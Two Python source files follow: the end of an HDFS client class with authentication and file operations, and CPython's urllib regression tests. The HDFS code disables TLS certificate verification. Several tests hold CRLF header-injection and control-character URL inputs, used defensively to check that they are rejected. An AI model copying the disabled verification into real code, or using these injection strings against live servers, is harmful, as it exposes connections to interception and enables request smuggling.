"https": f"socks5://localhost:{port}"
}
# If the tunnel is still fine and the client is already built, then
# just return the client immediately, probably everything is fine.
# Otherwise move on to setting up the client.
if cls.__client is not None:
return cls.__client
#
# Setup Authentication
#
if creds.username == "kerberos":
# This connection uses Kerberos authentication
if isinstance(HTTPSPNEGOAuth, Exception):
raise RuntimeError(
"requests-gssapi is not installed so Kerberos is not enabled."
" Install it, or install lvfs[all] to support all optional features."
) from HTTPSPNEGOAuth
session.auth = HTTPSPNEGOAuth()
elif creds.username is not None and creds.password is not None:
# This connection uses AD authentication
session.auth = requests.auth.HTTPBasicAuth(creds.username, creds.password)
# Unfortunately it seems the certificates are self signed so we will have to ignore that
session.verify = False
cls.__client = hdfs.InsecureClient(
url=creds.webhdfs_root,
# This is not actually authenticated, it's trusted, you just pick a user.
# It's done through a "user" parameter.
# It is not used if you are also using AD or Kerberos, and it could cause
# problems if you do so we avoid using that if AD or Kerberos is enabled
user=(
creds.username
if creds.username not in ("kerberos", None) and creds.password is None
else None
),
session=session
)
if cls.__tunnel is not None:
# Allow three seconds before the first check, only if using SSH
time.sleep(3)
for trials in range(10):
# Try connecting immediately so that we catch connection errors immediately
# rather than way later when they could be more difficult to spot
try:
cls.__client.list("/")
break
except requests.exceptions.ConnectionError as err:
if trials == 9:
# If this fails, at least 9 seconds have passed
# so the error is probably real.
raise err
time.sleep(1)
return cls.__client
@_wrap_error
async def read_binary(self) -> bytes:
""" Read a file to a string of bytes """
with self.__connect().read(self.path) as reader:
return reader.read()
@_wrap_error
async def write_binary(self, content: bytes, overwrite: bool = True):
""" Write a whole file from bytes, overwriting if necessary
Accepts
-------
content : bytes
The bytestring to write into this new file, or to replace the previous file content
overwrite : bool
Whether to overwrite the file, if it exists.
"""
with self.__connect().write(self.path, overwrite=overwrite) as writer:
writer.write(content)
@_wrap_error
async def ls(self, recursive: bool = False) -> List[URL]:
""" Get the list of files in this directory, if it is one
Returns a list of URL objects. Results are always absolute.
*DO NOT `root.join(file)`*
"""
conn = self.__connect()
try:
if recursive:
return [self] + [
URL.to(f"hdfs://{self.host}{root}/{kid_path}")
                    for root, dirs, files in conn.walk(self.path)
for kid_path in dirs + files
]
else:
# Not recursive
return [self.join(kid_path) for kid_path in conn.list(self.path)]
except hdfs.util.HdfsError as err:
if "not a directory" in err.message:
return [self]
else:
raise err
@_wrap_error
async def stat(self) -> Stat:
""" Get basic stat results for this file """
# The JSON looks like
# {
# 'accessTime': 1587745709481,
# 'blockSize': 268435456,
# 'childrenNum': 0,
# 'fileId': 1917677923,
# 'group': 'hdfs',
# 'length': 147603,
# 'modificationTime': 1587745709673,
# 'owner': 's0998yh0',
# 'pathSuffix': '',
# 'permission': '640',
# 'replication': 3,
# 'storagePolicy': 0,
# 'type': 'FILE'
# }
stat = self.__connect().status(self.path)
return Stat(
self,
kind=stat["type"].lower(),
size=stat["length"],
mtime=stat["modificationTime"] / 1000,
atime=stat["accessTime"] / 1000,
unix_permissions=int(stat["permission"], 8)
)
@_wrap_error
async def mkdir(self, ignore_if_exists: bool = False):
""" Create an empty directory and parent directories recursively
Accepts
-------
ignore_if_exists: boolean: DEPRECATED
Included for backward compatibility. Existing directories are always ignored.
"""
self.__connect().makedirs(self.path)
def supports_permissions(self) -> bool:
""" Some implementations, like blobs, do not always support permissions,
If this method returns true, the file system supports permissions
"""
return True
@_wrap_error
async def chmod(self, mode: int):
""" Modify permissions of the file so it has the desired mode """
self.__connect().set_permission(self.path, oct(mode)[2:])
@_wrap_error
async def unlink(self, ignore_if_missing: bool = False):
""" A lower-level method for removing one file or directory, to be overridden by specific
URL implementations. The recursive rm may or may not be built on this.
"""
self.__connect().delete(self.path)
@_wrap_error
async def rm(self, recursive: bool = True, ignore_if_missing: bool = False):
""" Delete a file or directory from HDFS.
Recursive deletes are faster than using unlink() repeatedly.
"""
self.__connect().delete(self.path, recursive=recursive)
async def read_stream(self):
""" Yield bytes from a file in whatever blocks are convenient for the filesystem.
Notes
-----
The implementation is free to read the whole file if necessary -
some systems cannot work any other way.
"""
        with self.__connect().read(self.path) as reader:
            # Stream the file in 1 MiB chunks rather than yielding only the first one
            while True:
                chunk = reader.read(1 << 20)
                if not chunk:
                    break
                yield chunk
async def write_stream(self, gen):
""" Fill a file from a generator of bytes objects
Notes
-----
The implementation is free to write the whole file if necessary -
some systems cannot work any other way.
"""
with self.__connect().write(self.path) as writer:
async for chunk in gen:
writer.write(chunk)
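
# Usage sketch (illustrative, not part of the original module): the methods on
# this class are coroutines wrapping a synchronous hdfs client, so callers
# await them from an event loop. The hdfs:// location below is a hypothetical
# example, and the sketch assumes Stat exposes its constructor fields
# (e.g. `size`) as attributes.
async def _example_round_trip():
    url = URL.to("hdfs://namenode/tmp/example.txt")  # hypothetical path
    await url.write_binary(b"hello world")           # create or replace the file
    data = await url.read_binary()                   # read it back as bytes
    info = await url.stat()                          # basic metadata
    return data, info.size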
|
test_urllib.py
|
"""Regression tests for what was in Python 2's "urllib" module"""
import urllib.parse
import urllib.request
import urllib.error
import http.client
import email.message
import io
import unittest
from unittest.mock import patch
from test import support
import os
try:
import ssl
except ImportError:
ssl = None
import sys
import tempfile
from nturl2path import url2pathname, pathname2url
from base64 import b64encode
import collections
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
# Shortcut for testing FancyURLopener
_urlopener = None
def urlopen(url, data=None, proxies=None):
"""urlopen(url [, data]) -> open file-like object"""
global _urlopener
if proxies is not None:
opener = urllib.request.FancyURLopener(proxies=proxies)
elif not _urlopener:
opener = FancyURLopener()
_urlopener = opener
else:
opener = _urlopener
if data is None:
return opener.open(url)
else:
return opener.open(url, data)
def FancyURLopener():
with support.check_warnings(
('FancyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
return urllib.request.FancyURLopener()
def fakehttp(fakedata, mock_close=False):
class FakeSocket(io.BytesIO):
io_refs = 1
def sendall(self, data):
FakeHTTPConnection.buf = data
def makefile(self, *args, **kwds):
self.io_refs += 1
return self
def read(self, amt=None):
if self.closed:
return b""
return io.BytesIO.read(self, amt)
def readline(self, length=None):
if self.closed:
return b""
return io.BytesIO.readline(self, length)
def close(self):
self.io_refs -= 1
if self.io_refs == 0:
io.BytesIO.close(self)
class FakeHTTPConnection(http.client.HTTPConnection):
# buffer to store data for verification in urlopen tests.
buf = None
def connect(self):
self.sock = FakeSocket(self.fakedata)
type(self).fakesock = self.sock
if mock_close:
# bpo-36918: HTTPConnection destructor calls close() which calls
# flush(). Problem: flush() calls self.fp.flush() which raises
# "ValueError: I/O operation on closed file" which is logged as an
# "Exception ignored in". Override close() to silence this error.
def close(self):
pass
FakeHTTPConnection.fakedata = fakedata
return FakeHTTPConnection
class FakeHTTPMixin(object):
def fakehttp(self, fakedata, mock_close=False):
fake_http_class = fakehttp(fakedata, mock_close=mock_close)
self._connection_class = http.client.HTTPConnection
http.client.HTTPConnection = fake_http_class
def unfakehttp(self):
http.client.HTTPConnection = self._connection_class
class FakeFTPMixin(object):
def fakeftp(self):
class FakeFtpWrapper(object):
def __init__(self, user, passwd, host, port, dirs, timeout=None,
persistent=True):
pass
def retrfile(self, file, type):
return io.BytesIO(), 0
def close(self):
pass
self._ftpwrapper_class = urllib.request.ftpwrapper
urllib.request.ftpwrapper = FakeFtpWrapper
def unfakeftp(self):
urllib.request.ftpwrapper = self._ftpwrapper_class
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
# Create a temp file to use for testing
self.text = bytes("test_urllib: %s\n" % self.__class__.__name__,
"ascii")
f = open(support.TESTFN, 'wb')
try:
f.write(self.text)
finally:
f.close()
self.pathname = support.TESTFN
self.returned_obj = urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual(b'', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertIsInstance(file_num, int, "fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it here and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertIsInstance(self.returned_obj.info(), email.message.Message)
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertIsNone(self.returned_obj.getcode())
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison.
# Use the iterator in the usual implicit way to test for ticket #4608.
for line in self.returned_obj:
self.assertEqual(line, self.text)
def test_relativelocalfile(self):
self.assertRaises(ValueError,urllib.request.urlopen,'./' + self.pathname)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k in list(os.environ):
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.request.getproxies_environment()
        # getproxies_environment() uses lowercased, truncated (no '_proxy') keys
self.assertEqual('localhost', proxies['no'])
# List of no_proxies with space.
self.env.set('NO_PROXY', 'localhost, anotherdomain.com, newdomain.com:1234')
self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com'))
self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com:8888'))
self.assertTrue(urllib.request.proxy_bypass_environment('newdomain.com:1234'))
def test_proxy_cgi_ignore(self):
try:
self.env.set('HTTP_PROXY', 'http://somewhere:3128')
proxies = urllib.request.getproxies_environment()
self.assertEqual('http://somewhere:3128', proxies['http'])
self.env.set('REQUEST_METHOD', 'GET')
proxies = urllib.request.getproxies_environment()
self.assertNotIn('http', proxies)
finally:
self.env.unset('REQUEST_METHOD')
self.env.unset('HTTP_PROXY')
def test_proxy_bypass_environment_host_match(self):
bypass = urllib.request.proxy_bypass_environment
self.env.set('NO_PROXY',
'localhost, anotherdomain.com, newdomain.com:1234, .d.o.t')
self.assertTrue(bypass('localhost'))
self.assertTrue(bypass('LocalHost')) # MixedCase
self.assertTrue(bypass('LOCALHOST')) # UPPERCASE
self.assertTrue(bypass('newdomain.com:1234'))
self.assertTrue(bypass('foo.d.o.t')) # issue 29142
self.assertTrue(bypass('anotherdomain.com:8888'))
self.assertTrue(bypass('www.newdomain.com:1234'))
self.assertFalse(bypass('prelocalhost'))
self.assertFalse(bypass('newdomain.com')) # no port
self.assertFalse(bypass('newdomain.com:1235')) # wrong port
class ProxyTests_withOrderedEnv(unittest.TestCase):
def setUp(self):
# We need to test conditions, where variable order _is_ significant
self._saved_env = os.environ
# Monkey patch os.environ, start with empty fake environment
os.environ = collections.OrderedDict()
def tearDown(self):
os.environ = self._saved_env
def test_getproxies_environment_prefer_lowercase(self):
# Test lowercase preference with removal
os.environ['no_proxy'] = ''
os.environ['No_Proxy'] = 'localhost'
self.assertFalse(urllib.request.proxy_bypass_environment('localhost'))
self.assertFalse(urllib.request.proxy_bypass_environment('arbitrary'))
os.environ['http_proxy'] = ''
os.environ['HTTP_PROXY'] = 'http://somewhere:3128'
proxies = urllib.request.getproxies_environment()
self.assertEqual({}, proxies)
# Test lowercase preference of proxy bypass and correct matching including ports
os.environ['no_proxy'] = 'localhost, noproxy.com, my.proxy:1234'
os.environ['No_Proxy'] = 'xyz.com'
self.assertTrue(urllib.request.proxy_bypass_environment('localhost'))
self.assertTrue(urllib.request.proxy_bypass_environment('noproxy.com:5678'))
self.assertTrue(urllib.request.proxy_bypass_environment('my.proxy:1234'))
self.assertFalse(urllib.request.proxy_bypass_environment('my.proxy'))
self.assertFalse(urllib.request.proxy_bypass_environment('arbitrary'))
# Test lowercase preference with replacement
os.environ['http_proxy'] = 'http://somewhere:3128'
os.environ['Http_Proxy'] = 'http://somewhereelse:3128'
proxies = urllib.request.getproxies_environment()
self.assertEqual('http://somewhere:3128', proxies['http'])
class urlopen_HttpTests(unittest.TestCase, FakeHTTPMixin, FakeFTPMixin):
"""Test urlopen() opening a fake http connection."""
def check_read(self, ver):
self.fakehttp(b"HTTP/" + ver + b" 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_url_fragment(self):
# Issue #11703: geturl() omits fragments in the original URL.
url = 'http://docs.python.org/library/urllib.html#OK'
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
fp = urllib.request.urlopen(url)
self.assertEqual(fp.geturl(), url)
finally:
self.unfakehttp()
def test_willclose(self):
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
resp = urlopen("http://www.python.org")
self.assertTrue(resp.fp.will_close)
finally:
self.unfakehttp()
@unittest.skipUnless(ssl, "ssl module required")
def test_url_with_control_char_rejected(self):
for char_no in list(range(0, 0x21)) + [0x7f]:
char = chr(char_no)
schemeless_url = f"//localhost:7777/test{char}/"
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello.")
try:
# We explicitly test urllib.request.urlopen() instead of the top
# level 'def urlopen()' function defined in this... (quite ugly)
# test suite. They use different url opening codepaths. Plain
# urlopen uses FancyURLOpener which goes via a codepath that
# calls urllib.parse.quote() on the URL which makes all of the
# above attempts at injection within the url _path_ safe.
escaped_char_repr = repr(char).replace('\\', r'\\')
InvalidURL = http.client.InvalidURL
with self.assertRaisesRegex(
InvalidURL, f"contain control.*{escaped_char_repr}"):
urllib.request.urlopen(f"http:{schemeless_url}")
with self.assertRaisesRegex(
InvalidURL, f"contain control.*{escaped_char_repr}"):
urllib.request.urlopen(f"https:{schemeless_url}")
# This code path quotes the URL so there is no injection.
resp = urlopen(f"http:{schemeless_url}")
self.assertNotIn(char, resp.geturl())
finally:
self.unfakehttp()
@unittest.skipUnless(ssl, "ssl module required")
def test_url_with_newline_header_injection_rejected(self):
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello.")
host = "localhost:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"
schemeless_url = "//" + host + ":8080/test/?test=a"
try:
# We explicitly test urllib.request.urlopen() instead of the top
# level 'def urlopen()' function defined in this... (quite ugly)
# test suite. They use different url opening codepaths. Plain
# urlopen uses FancyURLOpener which goes via a codepath that
# calls urllib.parse.quote() on the URL which makes all of the
# above attempts at injection within the url _path_ safe.
InvalidURL = http.client.InvalidURL
with self.assertRaisesRegex(
InvalidURL, r"contain control.*\\r.*(found at least . .)"):
urllib.request.urlopen(f"http:{schemeless_url}")
with self.assertRaisesRegex(InvalidURL, r"contain control.*\\n"):
urllib.request.urlopen(f"https:{schemeless_url}")
# This code path quotes the URL so there is no injection.
resp = urlopen(f"http:{schemeless_url}")
self.assertNotIn(' ', resp.geturl())
self.assertNotIn('\r', resp.geturl())
self.assertNotIn('\n', resp.geturl())
finally:
self.unfakehttp()
def test_read_0_9(self):
# "0.9" response accepted (but not "simple responses" without
# a status line)
self.check_read(b"0.9")
def test_read_1_0(self):
self.check_read(b"1.0")
def test_read_1_1(self):
self.check_read(b"1.1")
def test_read_bogus(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''', mock_close=True)
try:
self.assertRaises(OSError, urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_invalid_redirect(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 302 Found
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Location: file://guidocomputer.athome.com:/python/license
Connection: close
Content-Type: text/html; charset=iso-8859-1
''', mock_close=True)
try:
msg = "Redirection to url 'file:"
with self.assertRaisesRegex(urllib.error.HTTPError, msg):
urlopen("http://python.org/")
finally:
self.unfakehttp()
def test_redirect_limit_independent(self):
# Ticket #12923: make sure independent requests each use their
# own retry limit.
for i in range(FancyURLopener().maxtries):
self.fakehttp(b'''HTTP/1.1 302 Found
Location: file://guidocomputer.athome.com:/python/license
Connection: close
''', mock_close=True)
try:
self.assertRaises(urllib.error.HTTPError, urlopen,
"http://something")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises OSError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp(b'')
try:
self.assertRaises(OSError, urlopen, "http://something")
finally:
self.unfakehttp()
def test_missing_localfile(self):
# Test for #10836
with self.assertRaises(urllib.error.URLError) as e:
urlopen('file://localhost/a/file/which/doesnot/exists.py')
self.assertTrue(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_file_notexists(self):
fd, tmp_file = tempfile.mkstemp()
tmp_fileurl = 'file://localhost/' + tmp_file.replace(os.path.sep, '/')
try:
self.assertTrue(os.path.exists(tmp_file))
with urlopen(tmp_fileurl) as fobj:
self.assertTrue(fobj)
finally:
os.close(fd)
os.unlink(tmp_file)
self.assertFalse(os.path.exists(tmp_file))
with self.assertRaises(urllib.error.URLError):
urlopen(tmp_fileurl)
def test_ftp_nohost(self):
test_ftp_url = 'ftp:///path'
with self.assertRaises(urllib.error.URLError) as e:
urlopen(test_ftp_url)
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_ftp_nonexisting(self):
with self.assertRaises(urllib.error.URLError) as e:
urlopen('ftp://localhost/a/file/which/doesnot/exists.py')
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
@patch.object(urllib.request, 'MAXFTPCACHE', 0)
def test_ftp_cache_pruning(self):
self.fakeftp()
try:
urllib.request.ftpcache['test'] = urllib.request.ftpwrapper('user', 'pass', 'localhost', 21, [])
urlopen('ftp://localhost')
finally:
self.unfakeftp()
def test_userpass_inurl(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://user:pass@python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://user:pass@python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_userpass_inurl_w_spaces(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
userpass = "a b:c d"
url = "http://{}@python.org/".format(userpass)
fakehttp_wrapper = http.client.HTTPConnection
authorization = ("Authorization: Basic %s\r\n" %
b64encode(userpass.encode("ASCII")).decode("ASCII"))
fp = urlopen(url)
# The authorization header must be in place
self.assertIn(authorization, fakehttp_wrapper.buf.decode("UTF-8"))
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
# the spaces are quoted in URL so no match
self.assertNotEqual(fp.geturl(), url)
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_URLopener_deprecation(self):
with support.check_warnings(('',DeprecationWarning)):
urllib.request.URLopener()
@unittest.skipUnless(ssl, "ssl module required")
def test_cafile_and_context(self):
context = ssl.create_default_context()
with support.check_warnings(('', DeprecationWarning)):
with self.assertRaises(ValueError):
urllib.request.urlopen(
"https://localhost", cafile="/nonexistent/path", context=context
)
class urlopen_DataTests(unittest.TestCase):
"""Test urlopen() opening a data URL."""
def setUp(self):
# clear _opener global variable
self.addCleanup(urllib.request.urlcleanup)
# text containing URL special- and unicode-characters
self.text = "test data URLs :;,%=& \u00f6 \u00c4 "
# 2x1 pixel RGB PNG image with one black and one white pixel
self.image = (
b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x02\x00\x00\x00'
b'\x01\x08\x02\x00\x00\x00{@\xe8\xdd\x00\x00\x00\x01sRGB\x00\xae'
b'\xce\x1c\xe9\x00\x00\x00\x0fIDAT\x08\xd7c```\xf8\xff\xff?\x00'
b'\x06\x01\x02\xfe\no/\x1e\x00\x00\x00\x00IEND\xaeB`\x82')
self.text_url = (
"data:text/plain;charset=UTF-8,test%20data%20URLs%20%3A%3B%2C%25%3"
"D%26%20%C3%B6%20%C3%84%20")
self.text_url_base64 = (
"data:text/plain;charset=ISO-8859-1;base64,dGVzdCBkYXRhIFVSTHMgOjs"
"sJT0mIPYgxCA%3D")
# base64 encoded data URL that contains ignorable spaces,
# such as "\n", " ", "%0A", and "%20".
self.image_url = (
"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAIAAAABCAIAAAB7\n"
"QOjdAAAAAXNSR0IArs4c6QAAAA9JREFUCNdj%0AYGBg%2BP//PwAGAQL%2BCm8 "
"vHgAAAABJRU5ErkJggg%3D%3D%0A%20")
self.text_url_resp = urllib.request.urlopen(self.text_url)
self.text_url_base64_resp = urllib.request.urlopen(
self.text_url_base64)
self.image_url_resp = urllib.request.urlopen(self.image_url)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.text_url_resp, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_info(self):
self.assertIsInstance(self.text_url_resp.info(), email.message.Message)
self.assertEqual(self.text_url_base64_resp.info().get_params(),
[('text/plain', ''), ('charset', 'ISO-8859-1')])
self.assertEqual(self.image_url_resp.info()['content-length'],
str(len(self.image)))
self.assertEqual(urllib.request.urlopen("data:,").info().get_params(),
[('text/plain', ''), ('charset', 'US-ASCII')])
def test_geturl(self):
self.assertEqual(self.text_url_resp.geturl(), self.text_url)
self.assertEqual(self.text_url_base64_resp.geturl(),
self.text_url_base64)
self.assertEqual(self.image_url_resp.geturl(), self.image_url)
def test_read_text(self):
self.assertEqual(self.text_url_resp.read().decode(
dict(self.text_url_resp.info().get_params())['charset']), self.text)
def test_read_text_base64(self):
self.assertEqual(self.text_url_base64_resp.read().decode(
dict(self.text_url_base64_resp.info().get_params())['charset']),
self.text)
def test_read_image(self):
self.assertEqual(self.image_url_resp.read(), self.image)
def test_missing_comma(self):
self.assertRaises(ValueError,urllib.request.urlopen,'data:text/plain')
def test_invalid_base64_data(self):
# missing padding character
self.assertRaises(ValueError,urllib.request.urlopen,'data:;base64,Cg=')
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# clear _opener global variable
self.addCleanup(urllib.request.urlcleanup)
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
        # this only helps to make sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(support.TESTFN)
self.text = b'testing urllib.urlretrieve'
try:
FILE = open(support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
filePath = os.path.abspath(filePath)
try:
filePath.encode("utf-8")
except UnicodeEncodeError:
raise unittest.SkipTest("filePath is not encodable to utf8")
return "file://%s" % urllib.request.pathname2url(filePath)
def createNewTempFile(self, data=b""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.request.urlretrieve("file:%s" % support.TESTFN)
self.assertEqual(result[0], support.TESTFN)
self.assertIsInstance(result[1], email.message.Message,
"did not get an email.message.Message instance "
"as second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.request.urlretrieve(self.constructLocalFileUrl(
support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertTrue(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = open(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(block_count, block_read_size, file_size, count_holder=[0]):
self.assertIsInstance(block_count, int)
self.assertIsInstance(block_read_size, int)
self.assertIsInstance(file_size, int)
self.assertEqual(block_count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.request.urlretrieve(
self.constructLocalFileUrl(support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile()
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 5)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][2], 5)
self.assertEqual(report[1][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 8193)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][2], 8193)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[1][1], 8192)
self.assertEqual(report[2][1], 8192)
class urlretrieve_HttpTests(unittest.TestCase, FakeHTTPMixin):
"""Test urllib.urlretrieve() using fake http connections"""
def test_short_content_raises_ContentTooShortError(self):
self.addCleanup(urllib.request.urlcleanup)
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
def _reporthook(par1, par2, par3):
pass
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve(support.TEST_HTTP_URL,
reporthook=_reporthook)
finally:
self.unfakehttp()
def test_short_content_raises_ContentTooShortError_without_reporthook(self):
self.addCleanup(urllib.request.urlcleanup)
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve(support.TEST_HTTP_URL)
finally:
self.unfakehttp()
class QuotingTests(unittest.TestCase):
r"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 3986 (Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>.
The Python code of ``'%' + hex(ord(<character>))[2:]`` escapes a
character properly. Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
        # Make sure quote() does not quote letters, digits, and "_.-~"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-~"])
result = urllib.parse.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %r != %r" % (do_not_quote, result))
result = urllib.parse.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %r != %r" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
